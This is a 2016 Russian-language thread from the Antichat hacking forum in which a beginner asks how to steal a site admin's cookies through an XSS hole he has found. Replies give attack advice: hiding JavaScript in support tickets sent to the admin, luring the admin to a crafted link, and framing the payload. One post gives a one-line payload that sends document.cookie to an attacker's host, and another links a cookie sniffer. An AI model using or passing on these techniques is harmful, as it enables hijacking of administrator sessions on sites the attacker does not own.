Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   как достать куки админа ? (xss) (https://forum.antichat.xyz/showthread.php?t=440444)

ClayFox 27.04.2016 20:54
всем привет, я хочу изучать xss, читал статьи в форуме, но так и не нашел ответ моего вопроса... Так, я нашел xss в сайте, но дальше не знаю как достать куки админа и так далее... если можно скиньте ссылку на видео или хорошую статью про xss.

заранее спасибо

st55 27.04.2016 21:16
Ну, если XSS активная, то нужно встроить (например) как изображение и впарить страницу с JS кодом админу, потом получить куки. (К примеру тикеты. Отправляешь тикет с каким-то нейтральным текстом и встраиваешь туда JS код. Не догадаются, проверенно).

Если же пассивная - тут сложней. Придётся напрямую впаривать ссылку ему с JS кодом, а он может понять и не перейти. Такие дела. Эксплуатация XSS вообще штука простая.

ClayFox 27.04.2016 21:27
Цитата:
Сообщение от st55
st55 said:

Ну, если XSS активная, то нужно встроить (например) как изображение и впарить страницу с JS кодом админу, потом получить куки. (К примеру тикеты. Отправляешь тикет с каким-то нейтральным текстом и встраиваешь туда JS код. Не догадаются, проверенно).
Если же пассивная - тут сложней. Придётся напрямую впаривать ссылку ему с JS кодом, а он может понять и не перейти. Такие дела. Эксплуатация XSS вообще штука простая.
a как понять XSS активная или пассивная ?

faza02 27.04.2016 21:39
Цитата:
Сообщение от st55
st55 said:

Ну, если XSS активная, то нужно встроить (например) как изображение и впарить страницу с JS кодом админу, потом получить куки. (К примеру тикеты. Отправляешь тикет с каким-то нейтральным текстом и встраиваешь туда JS код. Не догадаются, проверенно).
Если же пассивная - тут сложней. Придётся напрямую впаривать ссылку ему с JS кодом, а он может понять и не перейти. Такие дела. Эксплуатация XSS вообще штука простая.
активные и пассивные? ты уверен?

t0ma5 27.04.2016 21:45
Цитата:
Сообщение от yarbabin
yarbabin said:

активные и пассивные? ты уверен?
наверно он не про xss

на 9 из 10 постов про xss хочется кидать линк, хотя бы на вики

https://ru.wikipedia.org/wiki/Межсайтовый_скриптинг

может прочтут

"если можно скиньте ссылку на видео или хорошую статью про xss."

блитц вроде что то такое говорил, "машину купил, права купил, ездить не купил"

то есть в интернетах вы не нашли ни одного описания, ни одного примера использования xss? пздц

Zen1T21 27.04.2016 23:59
Если в GET:

document.location=('http://ip/xss.php?' + document.cookie);

Если в POST:

забить

faza02 28.04.2016 02:08
Цитата:
Сообщение от Zen1T21
Zen1T21 said:

Если в GET:
document.location=('
http://ip/xss.php?
' + document.cookie);
Если в POST:
забить
да ну? иногда лучше жевать

M_script 28.04.2016 06:14
Цитата:
Сообщение от st55
st55 said:

Если же пассивная - тут сложней. Придётся напрямую впаривать ссылку ему с JS кодом
Никто так не делает. Пассивки во фреймах прячутся.

Цитата:
Сообщение от yarbabin
yarbabin said:

активные и пассивные? ты уверен?
Не надо новичков путать. Пусть сначала поймут суть, а потом уже с классификацией разбираются.

Ачат появился раньше, чем классификация сторед/рефлектед/ДОМ стала общепринятой. Во всех статьи у нас XSS делятся именно на активки/пассивки.

powerOfthemind 28.04.2016 12:13
Кто-то может поделиться снифером для xss или код скинуть? Буду благодарен

Zen1T21 28.04.2016 23:32
Цитата:
Сообщение от yarbabin
yarbabin said:

да ну? иногда лучше жевать
Как там на жердочке?)

nick_sale 01.05.2016 09:39
Цитата:
Сообщение от powerOfthemind
powerOfthemind said:

Кто-то может поделиться снифером для xss или код скинуть? Буду благодарен
Держи http://kanick.ru/sniffer/ . Когда-то им пользовался. Не знаю,как сейчас,но раньше работал на ура,скорее всего и сейчас тоже)


Время: 16:36